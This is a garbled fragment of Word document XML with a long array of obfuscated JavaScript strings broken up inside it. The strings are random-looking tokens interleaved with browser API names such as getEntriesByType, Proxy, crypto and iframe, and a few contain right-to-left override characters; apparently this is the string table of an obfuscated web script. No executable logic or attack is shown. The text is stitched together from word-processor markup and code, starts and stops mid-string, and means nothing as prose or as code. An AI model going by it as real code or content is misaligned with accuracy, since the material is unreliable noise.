M7z3v33a4OmEKwoWvOHwB4XSsGB_W5Rejd02D9GGLEX6k36cKDV1BfVfG6ImHr0iGc3kbaC-VFIjMPVT3M5CtnyKQpCRje9v-mw1Oi1lxCR6ia29ivq1KwOsDfrbtyhKMZS4IGm1lb9P9uk5rZMBdfakwBsiWDiZoMGdJhtHg9R9WittEcMrn6Zd1HSyYhBCSwtVPT5Iqaaio5c_oVc0xMKmHydDAqsBMmhrgIe3rT5lJ3iUtJDsa-hDBHKkmNU_IDBHf8HutQc2MEbKJhHJyAqyruEHlX_tEx4ZsYgQ7DqW6Vt0EJh770gN32phS_XF3zGciqVfESdomxzJPQUyjcbkODRbOj3ujZrJgfb8BYwMyPS8r0rAs7REEKN_dyqhX8xzpQkHcSn-5ec8WMwYxnQ7RjPFcokahSMs", "86Nj5Ta3s1-X", "cn0", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nrtt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-xo", "ZagTqByrx1Lylj8", "j9V_xjqBsEvXwhc", "reduce", "98hJjjKUkhiB_GAaQe4", "FvtZmCmEuEj4_SVKTPE", "kd19yQWE_ECOphEpbJv-TjS8", "A609-Q", "Math", "EcI", "No9grwyC-Hw", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"QTqEWP5kLboKVKI", "CBebbM1vVqMWRp0", "Om6mD9N8Nqp3", "01S_F50", "LGXcZ7klEfdxcqfZhBZJ57R8RwZI8FnLEYehmklGnmeqqEETUERzfPhzzVanwJ-3R0uiWX8", "DGHjEqQEN8tMS8nn8zsgna8FO256m1qYMqeBvV9s2k_h9GVrKF9uLNMjtiSmlPfCJCGWQB2-YLrQBP7qGg", "s2DOKqJ2LNpSbLjb6Q", "7yaZQ-dKf64NOOOqjzcU9bw1Pxtp3TL1Jw", "b4kxuRzq4Q", "E7g54Veq", "X0m6B9lWcg", "8CbDWbwGDs0PML2m31oTg9l8ChMUmyv6Tg", "myiqL8NKeI8", "sqVK2VmRngo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LEPSOpMJIutz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "5eQD7FHy7S0", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ryDNGaA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "abs", "LlapLcJHVJ4", "b5tYwCKY02yp", "-2\u202EYuuMIdcQn\u202D", "kTTwJIsjFM1BQN3SvV8x3ZEzW2VC9g", "children", "NcYMjG_z7Db-zzBMKNI", "function", "zpE_n1Lj-gbapRI", "O2jeQqpFF_gxLaU", "U8MfsWXI8iWXiAM-Q-XLSzE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>QFi-NdhjDg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "XtdalXyujU_S_WIeIK-LdRz68Y7vTeZ53w", "8CSDbPptaacjeaL2", "haIY4VnkwjqI5AQzBtKFEkfi", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GVyTGg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nodeName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "6TzFK6c6bfctcqq5yEkPrMlzVxBZ-zn_Xcbk2klXu2TNxVlLBgVSUb5J1xP5jM3qQ0r0WC2dBtq1KsHEeqIgHw", "match", "C6Ur43rm3x3Zzlc", "2cB87miNhgI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>toString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "E61hywjqlA", "PGDNZ5kZB9x-cd7B3wM", "interactive", "y-5C10uBjhfKlnQ", "qbo51XzQ7g", "min", "-5gc1WfC13uprj5JDbmI", "SapNkz-f726EjWA4HuHZ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setPrototypeOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "any", "bst0jze6qXak", "detail", "sJxGyV-Jrln7xRZrTIk", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TGc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ltltkQ-Hv0XJvUtSfw", "ga003CvjqGvbtxhCRfymCGk", "f_cbvHb23A", "PXKyBN04FpxiMM_k2xVm_Lo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>XQbKHoYdVg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "34teyWz0zAncqDI-R4nPMQ", "-2HzdoQ3Rto", "18h2ggX1hQ", "l3Q", "pEv2LuA", "hidden", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "lc4PomaMvQLRkWl1YabaTQ2V", "Cc9MkDePkCDp-Hsa", "JmGAKOt8HahlOPXc", "51v1cdk4IqtFDcmJvjQ4gLxSfHVt6U6QG9A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lrw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Y0C4aJ1pDIVwTw", "9wL2cYgyBvghEJOP0W47qP9PKDA", "r-5wg2my_z6q8UkbGa30VDyjoY7DXqo", "CBf9e4QtYdpJVcq8_zEqkdpcM3hi4QjLVLqz90YC5kn48A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dTqqeMg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "4mOqd-RPOKtLftSjjn4", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dispatchEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>addEventListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "RYx31QOB8Vmn2lZ8AeyeL0ut8LqObLl-xFMEB_X5PQ", "Go0q-wuE2g", "2F6XC-5FRK1xObi9mXVTvf0rJwoGhmavct-1wi1k-HzDzy4Pd1MaLsRU42HJ", "BNVs1Fs", "Mwy8QvpJbbRxHA", "NuJm2w-rznLE2FgOBw", "nNt9yxSC9lLJjlQxL7HlSh_HsuzhTvIy93stYrG_E40", "8SKXD_IcSbFu", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>attachEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "x9UxxU_H2GfWxwcjdb3oWzyDz-7bRtQL", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>XlI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "undefined", "13n0cKc6Rg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pXs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "catch", "substring", "zMNB_D-0m2z1", "SQHWQ9YcNtkvUYD20A", "sSWXbu91QvQ", "6jOVSIYxaLI0QoT41Q", "3BmUVo0", "DSzWeIIucOoqQtf66ngjt_hcZHc7", "wgS4aOITMI8", "6CDMVI4J", "mFDRVo87P69HdPflwA", "6xH3fpwrDO8tSd7p1TRY3bw", "round", "qjHRb7EhCuouLbmemG4I", "1mbfdvRKW95hVcvTgw", "n7cFjhHJ", "bwezb85xX88uNIQ", "aCWAEOE8PKVEZ50", "N12RKORyAJZ8a7w", "Yz_6d58EBuYUMs6H1T5J", "BgPYJ6Y6ZesuEA", "u3bSQL0jY-5bKPit", "A_pC8TPO4Q", "AoYVxSLsgGv5oSEtLtKedXnj-MydDuI8gBIeWNnfWO9tS7HY9q7dkz-Ye8lFHVdg7N8juPJN3Cdg", "Lqxf9AejoG-JszY9Hw", "bubbles", "itNNjzOd5Ejuvi5NB4evcziH88L1D8xi", "xIlL9jjTtXPn-nJD", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MrFDizWMug</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "set", "3gndOKZWXQ", "nK8S41H1wRrOthsMC-Y", "IDO0B9ljfYUUBqis", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mIBGnSifzGSilXcjSoPZdCOpkoI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "8rIb", "string", "IccYhRvZ23XqiiA", "VBXsU7EKRN07BdTZkCQ", "bot1_wW-", "g1CpCKFQHfMZUOE", "mXD4XowgNdVMQ5T-hwh635dX", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tagName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "qwKQB_RHKZs6KLbRhA", "2mDqPIY3QclPFoT2kCwy04o", "0-hpvR6lt1k", "80-FQcY", "e36hKtR3e5dRC5-HpUggh91YHDgnsRifTuiD9V5exVv_vAk0QSAsE_Ro1FfoqOSHahGNYHE", "N6olrgr0lB-Ty0hjXvKwEV7XsLeLP5pdyn4", "dlj3dw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>documentMode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "6WKucs1gKJY", "now", "dU72BJJ9ag", "xJse7EH3yUqN6CM8D9aO", "dzzFU9oze6Nq", "enumerable", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Odcu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "m4s_okyj-zbMzGhXZu2hFyWDg-XnYJR0", "xbUA033UyVk", "map", "^(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>--zn7c)?$|%", "Float64Array", "2Ngz8lLmwiz5gmI", "554", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ktg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "empty", "8d9TliOP62HwtCBTD4iSfS-Q29r8EdJ3x1kGMPSBT5JoD4T85_HNywvQLPEK", "kAvaOK1sXPk6", "Z4EEzXCVzQ", "4jj-K5c7dcMFGd6e", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Kphz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "6xiUDfhKSw", "4x7mf58AatwrQ8_G1WMBig", "bphlzxG3_W2z_xoTBuSrPG_v", "oUfPBKsXB6JqYfaUxXBH5ul8", "pDWJHKp6IaE", "UkuVIPh_BYVVNIKZ8x9s1qhTBkE", "B7Yo7Rnd9A7qnUIzBZi-HVqb3OrD", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HLw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "OVG0Lstxebp4R8rRqC1k9K4LfWRq_0mNNcjuqDQu4knh4Q4IFFxrMbRKowCj-tLS", "Proxy", "true", "Date", "6hioIA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GKRmxg_vmQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "bind", "type", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>indexOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "J0jGLJIlC_hQDMHtzx1d150rJA", "oC2SEb1_dbYgLamw41gGoP58SFsZmXfvP5rC2A", "xnSyZOR6KKBSUZ2lkFk2gw", "cNNy9x650BDKkAw", "1Z0krxE", "LE7bbrIdH-ph", "sdBjmya8uQ", "DGbCU7odffA3K_G41Xxe4fVYNB4_wBK-Mdf_-wdisF3ImnZGUytNGIo", "yT7BdJ1yftgQ", "YybrIosOaPsQIK_x7y0B7b87b39gyH6tZ8Gz_lhc5w", "zEf1N9cBMMBtbbTQ1nRQr41CNx01yyo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "l1SBJ-1qbKt4ft3u0Q", "Y07pRNkLHsY6Spw", "YrERg2Shwxfz_WM2HsE", "Int8Array", "wt9XkzSClCw", "eNNRzjWL_1jf21Y_W--8CVrV_IjjEJUe3Ho", "-zzifIY5L54CWdaCpDZjxtMcfhAurxWSGf7T1SJmnBzrv1dhQBV9fvtexzirz6TJaCrD", "6JFR7S6f5G26vHgUGPSVOw", "_xf-ZakBINkEJoGqw1sS", "GH-Oe8N9R5ViHA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CoJiqQjwzAo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "value", "ZVzfVL0cce5gKO31iBNf6bU_XRxVw2uqPYeQ00sPsDGAjjctY2UNHoxmqmWfx4D4CWOkSEaGC9vmPIKLPIRg", "Va8i20HK8TaJ2BgtIuqxNmLC0a3vV5FJ7A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zWOBGIo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "hIJQjzqBz2ytv3k", "clf_Z5E6UYZBHYA", "0rYCgX3LvSag431lFcnEayep0Ys", "XSPlU_8KUaVVDu6S", "x6Y-9G0", "g4VFzS7PmDCn4A", "AVy4PeBqZKY", "0I1PjSaKkk229ShlWJjnaCKxxPv7U_lU9xJgDK-gHdM", "BB74cYwWE-QjOsWJ0SA", "o7Ee", "top", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HRnkcPcsOA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "1GbiAJtBWqkfQA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>querySelector</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "O5piuAO1oWeQ_AwoMOj9JlGShOKuPMI", "TG-yWN0oK6NgYKr21HZAyZgWLR8GoUCKUQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lastIndexOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "svVtmT-2g2Hb2AlVP7niXBnWtoDSQep0pjctIebtJcoAVvCv5P_O1g", "stQj_ETJ0zE", "S0XubcI_KbduMNid", "apply", "XZRrsmqZ2kyknFEYeZi1VhGd3MvOPdIHxns", "moJV32Hi1h_J", "JfJe3w7StGWN", "bF_xWIwgLchcc-_h6hcnww", "21", "yh6SOPhZU60g", "QE2vJdtjbrdTBPzMqnI7hcAUNTp66EzVOQ", "nZs-uA3Tz0G12yhsXv_SaEE", "hqxh2wKdlVieyww", "vACTKq8", "^[\\x20-\\x7E]$", "C6lK6zutvGe7sDEjBOObO3y7zw", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"OzPkPYcre9wUB4M", "3R3Fd60_Le0", "t9V3-Qo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FjamNPlIHbID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Ui-LBOVPP7oye-I", "bV2nVA", "olaVff54XeY", "KVmUOPB6IplpZbjZiw9K0710fBdI5Q", "BrMF_Ui-skftmTNxeuyAMSCB3feYIax4", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "2A7WWdEP", "Py_2Lp01", "7MpumjmO71bMw0N6eLCxCjndruPxF4IFoysRINW0QNI5Yuj_vIf5pgu6brorAmxOtbYAlMUo9zYI", "qS-MJbBTa7pTNQ", "uE0", "GRznZvUpDeIvC7bo", "U8Me7ieU1lqn_HU", "nkbHEa0xHt9Bc7OLsjcS8Q", "Symbol", "Xxu_bM1hQ6YvGcyQkQs_2JsIGDpJ", "error", "zf5C_Te2lXvvxA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TypeError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "bRXfAek5TuIuIJLp5hpP8g", "sewV-3Hnx2P2qnpzForBfwyvnayLf-wt0lU", "24VrzXOK", "x_46pT7l6GDyvzgAIA", "message", "Vt5e3AOA7HrM6A", "gZA2jS7pzwo", "Mme7JfR6ONoDDt_isz4thYw", "input", "1z2XBqNiMg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PwvWGKc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "8XKJIrsvYpNFbA", "-TqlNMp5", "L_VwsEGEtVb82B1iXc_kCwnfmLOHb5BBiTVJG97zGf8peoLw7pf5qSLsH9Y5FmgZ0PRUxeA5txtGlH0", "de0jv0Xz7jfTlAgFNNU", "3lS-BONRELEVKqs", "6vdKrCWtiBCCj35fWZXFWA", "b7wwozC59RGrs2BaHdWwZSXM", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getEntriesByType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "2rY", "lBDZK-paKKF7J6jXjF4a_rYhHUxI1C3_NYWs1A4_pWTPnHNIOA", "D5Q", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hOMAhxnR</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "vudW9iKdnnHP5EhUVKk", "rvJR4iKdknDm-lhe", "HGqrYtxvCP4eZg", "4VeHQuBOObdOa_2snn9etvZwNz90hiSgadXip31y_ALfnXtLHxkPWJ5X91yPv9m-SQn2DlHtS7X0JdqUaNpxZ4IpQB-nvr13ndY", "Fx6vQONA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nodeType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>avlkzCCs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "PbgS80ewlGrbkwRXVOqvFw6n8MA", "OHO5JA","UbEj5gXXkVffnBZSXeirBlnAzvynO9gKt21tZv__f5xcfcLqhZPhrkGlTf13Om1F2qwZhdV76BFB2AIo727X", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GhmxLog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "\u202EEWibjQBAF\u202D", "x1_gJ582", "Fvg__0_2hFijkh5UPIS9WxSIh6nuOo1S5ykpfLTbHd15Pdj4sKOx_jmSUcN9QSUK_bBN", "aCWVaOIgNsZHFpL-wCgGr6Yy", "ShP4Yb0pQg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pgGNeNZpSLovJbqp_EJb-dkH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "-eRflHi64DL9sC8SLg", "KXu7QcsKPOdrb4WuymVt2A", "8f1t9Qu-2UXT1kghfea9C0HL_LyuJYUO2XRFNKnnAN9qaoas04Grr3_DDdNwCH8SrKt0rqB59TEQiT9x5WnfxinvpdIeWRaBOSUwLI9G", "dV3nZMgAV95JDZ6MmyVx3Ikd", "Image", "xiurMd54FpcP", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getOwnPropertyNames</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "4-Uf0mjK0zvhl3xSR5iEeiD0yJXXSqhwsxIDDvrBOuRDTPTiqdPFnRetJfYLWAlkgt0yh8kUkkA8uQZLsVGoqQKb67Q", "LN2", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gmrwMuMadoAPQME</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "tkPwPo4mKI9qddij8FZr", "rudG9TKdhEX770ZERZCZeheywJc", "Rpsi0UzerDaSzg4-", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mvsvnUXJnCjCxBdfbA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "crypto", "FATicPAwCfYbBb_Q8TZeoYo", "Option", "pow", "qvUenn7bgiPVpy0lFIf_cw", "WroEtnzz0z-jkA", "LNoRz3filR39yg", "iDLEVa0OBPJsVZiB", "object", "khDTIp8UQ_pON6I", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cPUBlHLU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "y1eWB45mQ8E", "EIs9_R_CyBylgUcv", "cpYe1nnA1nM", "JJ9Qiz-1mGyt", "eJlBrRq95267hEt2Qg", "69NU1i6F7mKEuXIqQf_GZA", "Sl6wMt9b", "p1LgNIwmAt8bGZeJ6gNsjMRqBDhT5zDNWvqNlyRQj3er_wgkdA", "3YRFgDed-WSMsD4", "Q9VtuhG5syLu2EVTbdnuGw", "MzPwRIosHc94evzbrQIjqtI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jzOYWQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "self", "F3GvHfFFSf5pFKvi30MYuqBiM10", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RWegOsdw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "n8NlyxqivU7EzWZZaa6gUg", "7SmYbdQgMdVqA6Lu7D8jsLwKVw", "QKhP5DiglHKlpDY", "Function", "kp4", "7-UbqGLM", "UNDEFINED", "WlaXHf9RVqB7LenI3RV--7sqVAlA2nGZJI6b2mxGtg", "MdBAymj_vEL-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>yxoSRIjVIG6i_aXDW6di9DFxbK7ZNQ", "W5pnvSy5", "tGy-MZJcBZ13TJDE10Rpy9ZRGzMV6x7W", "pgCkUPNEV5kWG5WA-G950fkuJSoz0kXedNKa73YN01ay8Wt4PWN4eoU4", "Gb818UDl7lvlgwJrNpv5AhaAwOnE", "A0SzF85HEZpIGdHx5QM", "max", "M0XFbaQsEvdtIf3FziJR5pswVwtD9niwFovoxz9T83fD9kVeDHN2FOEBgly78o6bBginPSraWIn7LYeMJaglHawbdkPCn9gmy6TL6y-irXVJt09H-nUY7w", "sptnpBGuyVa0mgtN", "39YE2nDyjA", "Safari", "l_wCrXXw_inyul0XY4Q", "5o80kl3H9g", "awzFRdkbEI41XvDF4lQYrfg", "9eMd2UKhpg", "xrYynyaX11s", "method", "1G_YCrsCBdlTY_26xnpCqvdm", "s0LrZoQ-MpR2UdXw-1lqh5tZDSsN_RPZGaiXmQcihWP17ActfglBcqR4nk6riLuA", "U_c44GjWtyvJ5HQLNvjWL2Ditw", "mmjjJ88D", "A-YwvgTO1VfUlR8ABqb3Tx2J5ca5I4hSz2E8RaazEJEpbYa2hc6roS6LQA", "7gDWErA", "yUzBcMZgUZBaQN2q5A", "4Tm4CsRXdJo", "9vZGkkSXjVLK7A", "bg2YX-IQYtR5WcCcjg", "E6x89AWoySk", "wVfvOJ8oPL1jT8HG7lx7jg", "jBX7LZ8", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eyWpS_U</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-JA", "LRL1WoYUTLN-KKCntw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>byteLength</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gRezIthr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Xbwz3UDU50eZ1B0hNvCuA2XE5_6rEo1O9XIXOY-qEMcmFbCqsMOHpBX0YrhDQnxk4_ZTjdc_u21L33I8xkjQ7lXtj7Y2", "5UaZQPRQbJY", "OzenP8F0E48JCpDrty5q1I0DPV4i_E_DCaaO_1srlQ", "ywKZetd3V7g7AK6g-Q", "P0vSPq84BfY", "J6Uo6EM", "seUw8TTKsi7xxgtM", "9waqGL0dYsJJO4OK", "EalE9xm4xG6dyGVZNMihCWmSyYI", "rfoqnFTA1QLClkwGboTvXQvatPHgVMNIqWgGQNmhaNAEDfX18s6HsFiqcaA", "Element", "V5lDty3u6XKgq1k0BbSOGQ", "llvbYfReRMNkHZmVt2wVj9k7Hg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FgDFVw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Mt1OnnK0ymf7", "LLwD92GZjWfKnDY", "jI4t8Hfj0Ec", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>YwvYWbsGOw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "uwmFQPVZT7IdOOOExHdKuPRqI0o7niz9Konh_CxIo0SHmkhEH20JCcsQ_X3cmpCqQ0msTlrRR_3oDOnSVowqC-BtSw", "ybkHozPPzD6LhEM", "Al4", "Of5HoCvoslPM", "SWe8XtsdPPx3eqSly2N6x4BUIwgRpEKJ", "Ovty_n_AuA2i9lcYKfM", "SE7nRo40FOFJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>characterSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "wZ4", "R2LQ", "K4Irvg", "String", "PNsPj0rA1Q", "-dJ29jyR1g7txltRZw", "bzKedaxRRfsgbOvNvlkBoM1tTxIDtybrTZ6tlC8TuSuJuBIIE3trCrwYyQbq78TNXRrrKXqdV8PmYNve", "vuhT-RahmHL__Sl3D4jC", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BRqrPttj</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ydBfsSq1g2r4s2hXVZrIahOki9aCKuo5hhs4G6fKf_9XSNbXnuvPkGmYENMuYRw3lZ01tfZL0QZz8RUfrXS7hHCC48tWBlY", "_st4i1rXjnv64Q", "123", "TJBJ3jejmUG5ujR6Xg", "DGKN", "o2mtJtx6bLI", "95FLtjSm_HO9iVFtSJf_", "lDKdf99wE4E", "window", "R1KtaMppXYI", "mivRNPpQLr92BrjdoVkW740", "iPEQmgne4Q_jtEAjAcWwTg", "JSON", "bzSwes9ib8YqA4n0sBIjn5wfXXtE5lKFT7CK2h4-zT3r9UJ_a1Y_I_Am3w", "Y_5X3DWU-WbooCQqD8mZMGXyoYeLC7Udv0B0A7-9Na9GC7Ge_J-AqVnqJetXGls316ogl4YL0Bk6rBYFjQ", "cP144w-q6EDflhIM", "bUDTDp8Ocst4ZK3ZmR4F", "vV66FrRISrY", "BDCsRalkOf0", "tF77bo4sXA", "-</w:t>
      </w:r>
